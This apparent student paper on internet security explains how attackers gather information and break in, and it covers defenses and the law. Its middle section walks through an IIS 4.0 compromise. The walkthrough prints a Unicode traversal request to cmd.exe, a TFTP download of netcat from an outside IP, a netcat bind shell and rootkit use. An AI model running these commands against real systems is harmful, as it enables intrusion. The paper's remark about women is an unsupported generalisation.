Guerndt, Dan - Internet Security and Hacking

7/28/2019 Guerndt, Dan - Internet Security and Hacking

1/10

Internet Security and Hacking

Daniel Guerndt

Department of Computer Science

University of Wisconsin [email protected]

Abstract

Companies lose millions of dollars due to bad security practices. More and more users areusing the Internet every day and a very small percentage of them know how to defendthemselves. It is important to understand how hackers get into systems in order to beat themat their own game. By knowing the tools and tricks of the trade that hackers use, one isbetter able to defend against an attack. This paper will also talk about a standard attack plan

that most attackers follow, defensive programs, how to maximize security, and also how thelaw punishes convicted offenders of hacking.

Introduction

A hacker is a Database Administrators (DBA) worst nightmare. A company could gobankrupt or loose millions of dollars due to bad security practices. Whether theyre multipleattackers or just a single attacker, the company is totally dependent on the DBA. SomeDatabase Administrators would prefer going into a heavy military war zone then having todefend against an attack [1]. A patient hacker has an unlimited amount of time and resourcesto try and crack the case.

Types of Attackers

There are three types of attackers, in the form of a pyramid [2]. On the bottom portion of thepyramid exists what is known as Script Kiddies. They have limited knowledge of computertechnology and programming. A Script Kiddy simply acquires scripts found on the Internetand deploys their use. In general, they fire off random scripts until something works. Theydo tend to get caught more frequently due to their lack of knowledge; however, they still

pose a dramatic threat to organizations. In the middle of the pyramid exists an IT savvyperson. These people understand how to use programming and scripting languages. Theyalso understand vulnerabilities, but in most cases the subject cannot find new vulnerabilities.They are also intelligent enough to use the exploit code and tools with precision. At the topof the pyramid is the cream of the crop. These people have the IQs to boil water. They havethe ability to find new vulnerabilities and to write exploit code and tools. Thankfully, thepeople at the top of the pyramid are limited in numbers. However, they cause the most
mailto:[email protected]:[email protected]


2/10

problems, not only because of their intelligence level, but also in their general willingness togive out the tools they have made to the public.

The Smart Hacker

A smart hacker is a companys worst nightmare. Do not be fooled into thinking that anattack is not planned. Considering the amount of time an attacker could spend in jail for anassault on an organization, smart hackers come up with elaborate plans. They also have thevirtue of patience to an extreme level. A smart hacker knows that traps are occasionally setup in defensive measures and that the most obvious point of entry could end up being thedemise of the hacker. They do extensive research on their target, or targets, beforeunleashing any form of attacks.

An attackers main enemy against his or her target is the System Administrator. A SystemAdministrator is in charge of the security of the system. He or she may have others also

involved, but the responsibility is on the admin. Suppose the attacker finds out, throughresearch, that the System Administrator is going on a far away vacation for two weeks. If noone understands the System Administrators job, or the security measures set up, the attackerhas two full weeks to get access. Even if something goes wrong for the attacker, he or shehas a lot of time to get to the root of a system. Once an attacker gets system access, its allover because the attacker can hide his tracks easily from there on. In essence, the attacker isthe new unauthorized admin because even the System Administrator cannot find any trails orevidence of the assault.

After getting in, a smart hacker will also wait a few weeks for the system administrator toback up the system [3]. This way, if his presence is ever discovered, the attacker is still in

the old recovery.

Information a hacker needs

A hacker needs first and for most, information. The first piece of information an attackwould want is the targets domain name. If his or her target has a website, that is almostalways the first point of research. If the targets website is unknown to the attacker, then he orshe would probably search using a whois database. An attacker would want to know thename of the System Administrator or Database Administrator. After obtaining thisinformation, the attacker can probably find out what hours the admin works. He or she

would also want to know the operation system of the network and its version number. Everyoperating system has different vulnerabilities [2]. Without knowing which operating systemthe network is running on, it can be near to impossible to use vulnerabilities. Versionnumbers are also very important because some patches kill off old vulnerabilities. If theattacker wants to get access to a database, he or she would also need to find out the type ofdatabase ran as well as its version number. Another item an attacker needs is at least one IPaddress. After obtaining one IP address, the attacker can run a stealth scan of the network.


3/10

This stealth scan will provide the attacker with the rest of the IP addresses of the network, allof the open ports on each terminal, and other things, depending on the scanner.

Tools a hacker needs

A hacker also needs tools. All of the tools can be found on the Internet. One of the toolsneeded for an attack is a way to scan open ports. Every book Ive used came up with twomain programs. The first being Netcat. In the hacker community, Netcat is known as theswiss army knife of hacker tools because it has many different features [2]. Netcat is afeatured networking utility, which reads and writes data across network connections, usingthe TCP/IP protocol (http://netcat.sourceforge.net/). Its a reliable back-end tool that canbe used directly or easily driven by other programs and scripts.

Another program that is widely used is Nmap (http://www.insecure.org/nmap/index.html).Nmap is probably the best stand-alone stealthy port-scanning tool out there. It is

considered stealthy because it does not need to fully connect with a TCP connection [4]. Theprogram sends a SYN, and as soon as it receives an ACK, it terminates the connection [4].All thats needed to use is an IP address or website. Depending on the parameters entered,Nmap can list all IP addresses on a network as well as a list of open ports on each terminal.It also has other features such as detecting the operating system, version number of theoperating system, and even IDS and firewall information. However, an attacker will usuallyonly use Nmap for port scanning because everything else is fairly easy to detect. Since theseport-scanning tools do not give the operating system and/or database information in astealthy manor, attackers will often consult whois databases.

Whois Databases

In just about every case, an attacker will consult these databases to the basic research theyneed to get started. Whois queries provide a hacker with the majority of information thathackers need to begin their attacks [2]. There are four main types of queries: registrar,domain, network, and point of contact [2].

A great place to find registrar information is from http://www.internic.net/whois.html. Atarget often has several registrars. Internic.net has a rather large listing of associated registrarinformation. An attacker must determine the correct registrar so that he or she can submitdetailed queries to the correct database in subsequent steps [2]. Once the correct registrar is

found, a domain query is then the next best approach.

A domain query will often provide the name of the registrant, the domain name, theadministrative contact, when the record was created and updated, and the primary andsecondary DNS servers [2]. This query can also be used at the same site used for registrarinformation.
http://netcat.sourceforge.net/http://netcat.sourceforge.net/


4/10

A network query maintains specific network blocks that an organization owns. TheAmerican Registry for Internet Numbers (ARIN) is a popular database that can be used todetermine networks associated with a target domain [2]. The web page for this database ishttp://www.arin.net.

The ARIN database can also be used for point of contact (POC) queries. If an email addressis provided in the domain query, it can be used to find more information by searching theARIN database using the email address directly. Sometimes after doing this, an attacker willfind more domains that the attacker did not know about [2]

Social Engineering

An attacker often requires help from the inside of organizations. An attackers main goal inusing social engineering is to act as if he belongs. By gaining trusted individuals, he or shemay not even have to do any hacking. An old epidemic that happened several years ago

was the I LOVE YOU virus that attached to emails and then massively sent it out using atargets address book. The reason this virus had such an impact was due to the subject title.A lot of people that were not IT savvy couldnt help resist to find out who loved them somuch [1]. This example was not involved with hacking, however, hackers can use the sameploys to trick people into doing what they want. If an attacker were extremely dedicated tocracking the case of some company, perhaps he or she would go to the headquarters. Aperfect demonstration of an attacker arriving at a headquarters is in the following example[3]:

After arriving at the target location, the social engineer strikes up small talk withanother employee as they walk toward the building. When they arrive at the lockeddoor, the social engineer will pat down his coat pockets, looking for his key or pass

card. In such a case, most anyone will do the other guy a favor and let him in withtheir key. Far from playing the part of the nervous interloper, the social engineer willenter the premises with calm confidence; pretending he truly belongs where he is. Allthe while, he will move about in a totally unassuming manor, obliquelyacknowledging others going about his job. All the while, he will make a point of notattracting attention to himself, unobtrusively scooping the surroundings for tidbits ofinformation that will aid him in his goal. The main systems are typically easy tolocate as they are invariably showcased behind large glass walls. The OS of thesystems running inside the network will be painfully obvious by the unattendedmonitors, which display the user interface and even the OS version number. Thepresence of Sun MicroSystems Sparc hardware in the computer room narrows the

OS possibly down to Solaris or RedHat Linux. The toy penguins in the leaddevelopers office are sufficient clue that Linux is widely used. A stroll through thecubicles leads to the discovery of a number of Post-It notes near (or even on) amonitor that reveal a users current login and password combination.

The example above may be a bit more extreme, however, everything it stated is quitepossible with social engineering skills.
http://www.arin.net/http://www.arin.net/


5/10

Another issue in social engineering is women. A lot of men dont think of women as ITsavvy and will give out more information to them because the men dont think the womencan do any damage with it [3].

First step into breaking a system

This step is actually composed of two steps, but the first step is quite simple. The first thingthat is required in this case is to find the targets website [3]. Doing a simple Google searchon the targets name will often provide an attacker with the desired results. The second partof this step requires the attacker to run some sort of port-scanner [3]. In an example used inHack Proofing Your Web Applications, they used nslookup in a command prompt. However,Nmap, Netcat or a variety of other programs could have been used. Nslookup can bedownloaded and ran in just about any command prompt or used directly athttp://www.kloth.net/services/nslookup.php. It mainly just returns an IP address and thedomain name, but more information can be found for nslookup on the web. Here is an

example of using nslookup [3]:$ nslookup www.targetsite.com

Server: localhostAddress: 127.0.0.1Non-authoritative answer: Name:www.targetsite.comAddress: 208.37.215.233

Second step into breaking a system

Next we need the rest of the target networks IP address range. One thing an attacker might

do is consult the ARIN database using the address we received in the previous step.Otherwise an attacker might use Nmap using its stealth detection to get every IP addressrunning with open ports available. Using the ARIN database would provide the attacker withevery IP address allocated to the target. Nmap will not display an IP address that does nothave any open ports, so using both methods is generally preferable. Here is an exampleusing the ARIN database and Nmap [3]:

$ whois h whois.arin.net 208.37.215.233Treachery Unlimited (NETBLK-TREACHERY-COM)208.37.215.0 208.37.215.255

$ nmap sP 208.37.215.0/24Interesting ports on [208.37.215.233]

[The 1529 ports scanned but not shown below are in state: closed]Port State Service21/tcp open ftp22/tcp open ssn23/tcp open telnet79/tcp open finger 80/tcp open http143/tcp open imap2
http://www.kloth.net/services/nslookup.phphttp://www.kloth.net/services/nslookup.phphttp://www.targetsite.com/http://www.targetsite.com/http://www.targetsite.com/http://www.kloth.net/services/nslookup.phphttp://www.targetsite.com/http://www.targetsite.com/


6/10

Nmap run completed 256 IP addresses [1 host up| scanned in 360 seconds]From the results from Nmap, there are a lot of possible vulnerabilities from all the differentservices listed. One of the easiest to try things out on is telnet, which will be used in thesteps below. If there are vulnerabilities in the services listed from Nmap, chances are prettygood that a hacker can get access. This Nmap result is actually quite small as well since it

scanned 256 IP addresses. However, even one terminal with multiple open ports can lead toserious issues.

Third step into breaking a system

Most web servers are designed to provide their HTTP version and operating system [3]. Toget the operating system, we can use telnet and perform a HTTP HEAD request [3]. Here isan example of an attacker using Telnet to his or her advantage [3]:

$ telent 208.37.215.233 80Trying 208.37.215.233

Connected to 208.37.215.233.Escape character is ^].

HEAD / HTTP/1.0HTTP/1.1 200 OKServer: Microsoft-IIS/4.0Date: Fri, 16 Feb 2001 18:45:23 GMTContext-Length:526Context-Type: text/htmlConnection closed by foreign host.

From the results, we find out that the target system uses Microsoft-IIS version 4.0, which hasseveral known vulnerabilities listed on the Internet. It also provides us with the Operating

system being Windows NT. The only easy way to get into a system is by exploiting thevulnerabilities of systems. Windows NT has a lot of known vulnerabilities, however, theusers can often find patches to fix these vulnerabilities. Here are a couple web pages that listknown vulnerabilities: http://cve.mitre.org/cve,www.securityfocus.com,http://packetstorm.securify.com [3]. After checking for Windows NT and Microsoft IISvulnerabilities, we find 400 known vulnerabilities dated since 1995 [3]. Since remote accessis the safest approach, a smart attacker will use the safest vulnerabilities. As a rule of thumb,the latest vulnerabilities are often the least defended against [3].

Fourth step into breaking a system

After finding out a few vulnerabilities that should work, we can use telnet again to try one ofthem. One of Windows NTs known vulnerabilities is from using Unicode. The Unicodebug tricks the system into executing its command controller-cmd.exe [3]. Here is an exampleof using this known exploit which tries to write to a file on a system[3]:

$ telnet 208.37.215.233 80Trying 208.37.215.233Connected to 208.37.215.233.
http://cve.mitre.org/cvehttp://cve.mitre.org/cvehttp://www.securityfocus.com/http://packetstorm.securify.com/http://cve.mitre.org/cvehttp://www.securityfocus.com/http://packetstorm.securify.com/


7/10

Escape character is ^].GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+>+test.msg

HTTP/1.1 200 OKServer: Microsoft-IIS/4.0

Date: Fri, 16 Feb 2001 19:20:32 GMTContent-Length: 0Content-Type: text/plainConnection closed by foreign host.

This attempt appears to be successful, but to make sure it successfully worked, we need to tryand read the file we attempted to write on the server [3]. If successful, we will be able toread and write on the given server. This will allow us to do just about anything we want tocompromise the system. To test the results, use the following GET command after issuinganother Telnet connection [3]:

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msgIf the result shows test message, which is the title of the file created earlier, it was

successful. This pretty much allows the attacker to do anything he or she wants [3]. To issuethe full scale attack, the attacker needs a few tools to get the job done. A rootkit is needed tohide the attackers tracks [3]. Rootkits can be downloaded and used from many different siteson the Internet. The correct rootkit must be downloaded based on the operating system, orwhatever attack is being done. Another necessary item is a way to bind a specified port onthe target system in order to log in directly [3]. The program used in this example is Netcat.With these two tools, the attack can be issued.

The Attack

The attacker needs a way to download the rootkit and Netcat into the target system. SinceWindows NT does not support passive FTP, the attacker must use TFTP (Trivial FileTransfer Protocol). In order to use TFTP, the attacker issues the following GET [3]:

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+nc.exe

The attacker then must download Netcat and the rootkit using TFTP. This can be done byusing a two separate GETs for the files by replacing nc.exe with the file names of the rootkitand Netcat [3]. After the items are downloaded onto the server, the attacker must issue aNetcat command to bind a port for the attackers use. Here is an example of using the GETcommand to bind a port using Netcat [3]:

GET /scripts/.%c1%9c../winnt/system32/cmd.exe?/c+nc.exe-1+-p+100+-t+-

e+cmd.exeThe port cannot be an open port already in use by the system, so for this example, port 100 isused. After this step, the attacker issues one final command to get system access [3]:

$ telnet 208.37.215.233 100Trying 208.37.215.233.Connected to 208.37.215.233.Escape character is ^].

C:\winnt\system32\>


8/10

This whole process may seem a bit complicated, but these vulnerabilities are clearly listed onthe Internet. They sometimes show a step-by-step process just like I have gone through.After the attacker has system access, he or she would put in the rootkit to hide everything thathas just happened from the System Administrator.

Defending against attacks

The best approach of defense against an attack is through patching. Vendors will fix knownvulnerabilities as soon as they hear about them. A System Administrator should look forthese patches on a daily basis. If an attacker cannot find vulnerability on a system, it isconsiderably harder to hack into a system.

Firewalls are also necessary. The less open ports to the public, the better chance a knownvulnerability can be used. However, firewalls also have known vulnerabilities [3], sofirewall information must be kept confidential.

A companies website must also not reveal any incriminating information. All of theinformation needed to hack a site must not be on a website. Also be careful what informationis released to Whois databases[3]. If the attacker cannot find out who the System Administeris, he or she could run into problems. If an attacker cannot find the needed information, he orshe will often give up, unless dedicated to the attack.

Companies also need to be careful about what is displayed at their company site. Havinglittle toy penguins hanging around in offices does not help security. Displaying serverinformation to the public is also a bad idea. Companies many want to lock down the serverrooms completely and remove sticker labels from hardware. Only let trusted individuals into

the server room.

Another useful tool is an intrusion detection system (IDS). These find bad traffic, but do notnecessarily stop it [1]. They always monitor the network for abnormal conditions bothinternally and externally in the network and provide another security level [1]. IDSs can becompletely passive and therefore not directly detectable by an attacker [1]. There are a lot offree IDSs available to the public, however paying for one is probably the best approachsince attackers have less access to them.

70% of all attacks come from trusted employees [3]. Employees occasionally becomedisgruntled and think they can get away with anything. In some cases, this is true, but there

should be several internal security measures set up. All code must be documented properly.If a programmer quits an organization and the code worked on is not documented properly,they may have left malicious code hidden inside. This can require the company to do a full-scale safety check in the software costing time and money. However, with properdocumentation and organization, its much easier to find such obstacles.


9/10

A System Administrator could also set up an easy entry point for which he wants to drawhackers into. A trap like this, if properly set up, will get flagged immediately and hopefullysome information about the hacker is left behind.

Law and Hacking

An unwanted intrusion of a system is regarded as an extreme offense. It is often considered afelony. If convicted, the accused hacker can face many years in jail and huge fines. Thecharge is based on how much damage the hacker did against a company, the attackers age,the target, etc. If the hacker caused enough damage, the attacker should expect to stay in jailfor more then five years, with up to a $250,000 fine.

Another thing to take note of before running off and starting to hack is having the felonylabel over ones head. A convicted offender would have an extremely hard time getting neara computer, or an IT job.

Conclusion

There are many types of hackers out there, all of whom are dangerous. To successfullypenetrate a system, an attacker needs tools and information. There is nothing you can do tostop hacking tools from being spread around, but you can protect yourself from an invasionby hiding information. Anything is penetrable, no matter how secure. However, the moresecure a network is, the harder it is to crack.

Not all hacking is done over the Internet. Be weary of disgruntled employees and socialengineering ploys. Disgruntled employees do the majority of all attacks.

The best way to protect a network from invasion is by getting the latest patches fromvendors. This in itself will cancel out hundreds of known vulnerabilities and make a system,or network, much safer.

References

[1] Ahmad, David R. Mirza.; Russel, Ryan.Hack Proofing Your Network. Rockland:Syngress Publishing, Inc. 2002.

[2] McClure, Stuart; Scambray, Joel; Kurtz, George.Hacking Explosed: Network SecuritySecrets & Solutions. Fourth Edition. Berkeley: Nordin. 2003.

[3] Hack Proofing Your Web Applications: The Only Way to Stop a Hacker is to Think LikeOne. Rockland: Syngress Publishing, Inc., 2001.[4] Chirillo, John.Hack Attacks Testing: How to Conduct Your Own Security Audit.Indianapolis: John Wiely & Sons, Inc. 2003.


10/10

Guerndt, Dan - Internet Security and Hacking

Documents

Transcript of Guerndt, Dan - Internet Security and Hacking